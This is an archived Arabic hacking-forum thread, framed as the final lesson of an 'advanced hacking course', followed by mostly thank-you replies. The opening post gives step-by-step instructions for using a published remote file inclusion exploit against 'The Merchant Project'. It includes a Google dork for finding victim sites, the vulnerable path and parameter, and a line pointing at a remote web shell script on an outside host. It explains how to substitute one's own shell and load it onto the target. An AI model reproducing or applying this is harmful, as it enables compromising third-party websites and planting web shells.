المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس العاشر: استغلال الثغرات المكتوبة بلغة html



ASDELY-ScOrPiOn
06-12-2009, 04:53 PM
أخباركمـ


نكمل علي بركة الله

طبعا كلنا او البعض منا يعرف عن انواع من الثغرات

لكن ما يعرفها كلها

يعرف ان فيه فايل انكلود وسكيول انجاكشن وكوماند اكسزيشان ...

المهمـ حتي نقدر نفهمـ كويس نستغل اي ثغرة تقابلنا

بعض اللي اكتشفوا هذة الثغرات استعملوا لغات برمجيه مثا html ..... php .... perl

حتي يطبقون عن طريقها

بشرح اليومـ استغلال ثغرات <html>

اي ثغرة تلقي بأول الصفحه هذا الكود <html> تعرف انها ثغرة من نوع الهتمل

ولو درست لغة الات تي ام ال قبل كدا بتفهمـ كويس ؟

الثغرة الموجودة بالميلورمـ

http://www.milw0rm.com/exploits/3818 (http://www.dev-chat.com/vb/redirector.php?url=http%3A%2F%2Fwww.milw0rm.com%2F exploits%2F3818)

راح اشرح التطبيق عليها ..
----------

<html>
بداية الصفحه

--------

Remote File Include Exploit
النوع

----

Script Name: 2005-2006 The Merchant Project


-----------


Dork : http://www.google.com.tr/search?q=%22The+Merchant+Project%22&hl=tr&start=30&sa=N


كود البحث

---------

------------

//Basic exploit,but any time : (

هذا اهمـ شئ وهو ثوابت الكود

الملفات اللي بنستغل من خلالها او اللي بيها الخطأ
---------

var path="/help"

كود البحث

---------

------------

//Basic exploit,but any time : (

هذا اهمـ شئ وهو ثوابت الكود

الملفات اللي بنستغل من خلالها او اللي بيها الخطأ

var path="/help"

مجلد المساعده يحمل الصفحه اللي بيها الثغرة
--------

var adres="/index.php?" //File name

الصفحة اللي فيها كود التغرة
--------

var acik ="show=" // Line x

متغير التغرة
--------

var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script

هنا نضع الشيل بين الاقواس

وللبحث عنوا كنترول f
ctrl+f = shll

----------

اوكـ ما فيه غموض

خطوات العمل
1- تاخد الكود الموجود بالصفحه وتحدد الكل وتنسخوا
http://www9.0zz0.com/2008/10/09/22/776956251.jpg

2- تغير رابط الشي الي رابط الشيل حقك
http://www10.0zz0.com/2008/10/09/22/160354734.jpg

3- تحفظوا بأمتداد html
http://www10.0zz0.com/2008/10/09/22/824594962.jpg

4- نفتح الصفحه بالمتصفح عادي ونضع رابط الموقع المصاب كما بالصورة
http://www10.0zz0.com/2008/10/09/22/212752198.jpg

واضغطـ اوكـ بيحملكـ الشيل بالصفحه ومبروك عليك
http://www10.0zz0.com/2008/10/09/23/726254247.jpg


------

وهكذا نكون قد أنهينا الدرس العاشر والأخير من دورة الهكر المتقدمة
آمل أن تكون قد أعجبتكم وأن تكونوا أستفدتم منها ولو بالقليل

بالتوفيق

maknassyhacker
06-26-2009, 03:29 AM
يعطيك العافيه

عصام-محمد
07-02-2009, 04:44 PM
بارك الله فيك

IbN Al3RaQ
07-20-2009, 02:53 AM
شكرا جزيلا

عاشت الايادي

تحياتي

إبراهيم
07-21-2009, 05:37 PM
الله يعطيكـ العافية على مجهودكـ
تقديري وإحترامي لكـ أخويasdely

alzaaem
07-22-2009, 03:42 PM
يسلمو اديك و الله ماقصرت يا غالي

تحياتي

BLACK.JaGuAr
08-06-2009, 08:57 PM
مجهود جبار ورائع وكبير يامعلم وبروفسور المنتدى

BLACK.JaGuAr
09-12-2009, 02:26 AM
http://www.samysoft.net/forumim/shokr/1/868686.gif

اسد سوريا
09-20-2009, 11:57 AM
مشكور ياغالي

°•ஓ•°M G R N°•ஓ•°
10-15-2009, 03:02 AM
يعطيك ألف ألف عافيه على هالدرس
ومشكور وماقصرت
دمت بود
..
~

ya-ss-ine
12-29-2009, 09:59 PM
machkouuuuuuuuuuuurrrrrrrreeeeeeeeee
yaa batalllee

Dmar alzulfi
01-03-2010, 04:48 PM
مششكور والله يعطيك العاافيه..}} ننتظر جديدك..}}

الفاني
01-14-2010, 01:41 PM
مشكوووووور والله يعطيك الف عافيه

عطر الكون
01-15-2010, 06:03 PM
مشكوووووور والله يعطيك الف عافيه

sniper81hd
04-23-2010, 09:22 PM
مشكور اخي الكريم

mr.boxt
05-29-2010, 06:58 PM
كبير والله كبير .. تسلم حيات ألبي

شوزل الهكر
05-30-2010, 06:47 PM
مشكوووووووووووووووووووووو وووووووور

huck 6x
06-29-2010, 09:35 PM
الله يعطيكـ العافية على مجهودكـ

T!F!NaR
07-13-2010, 01:52 PM
مشكور اخي على الموضوع الرائع
بارك الله فيك و جعله في ميزان حسناتك

khulud
08-02-2010, 10:55 AM
الله يسعدك

Mays
08-16-2010, 10:30 PM
آنآ صرآحه آٍتفدت آشيآآآآآآآآآآآآآآآآآآآآآء كتييييييييييييييييره

بس مآ عرفت آطبقهآ لأنووو مآ آشووف الصور غير مدعومه

وثآنيآ الشيل غير موجود عندي كيف آجيبه

بليييييييييييز علموني

XvvX
08-21-2010, 05:53 PM
http://www.samysoft.net/forumim/shokr/1/868686.gif

benzaxoll
08-22-2010, 11:40 PM
مشكور وبارك الله فيك ابدعت بطرحك يعطيك ألف عافية .....

System 32
09-06-2010, 04:23 AM
مشكوووووووووووووووووووووو ووووووووووووووووووووووووو ووووووووور

ابن الموت
11-14-2010, 02:10 AM
يعطيك العافيه علا مجهودك بصراحه انا قريت الدروس كلهم وما فهمت شي وعتهم 2 شرحك جميل بس يلي يفهم بالمواقع والبرمجه والسيرفرات

ابن الموت
11-14-2010, 02:18 AM
بس الشيل عائق مو موجود عندي ومشكل كيف نجيب الشل

http://www12.0zz0.com/2010/11/13/23/770130873.gif

@العنكبوت@

Black Spider
12-22-2010, 08:26 PM
بارك الله فيك

تسلم على هذا الطرح

ريكووو
12-26-2010, 10:05 PM
مشكوووووووووووووووووووووو ووووووووووور,,

hooos
01-14-2011, 09:05 AM
مشكور والله يعطيك العافيه

the.punisher
01-21-2011, 01:34 AM
يسلمووووووووويا فنان الموضوع رائع

dark_ma
01-21-2011, 02:25 AM
مجهود جبار ورائع وكبير يامعلم وبروفسور المنتدى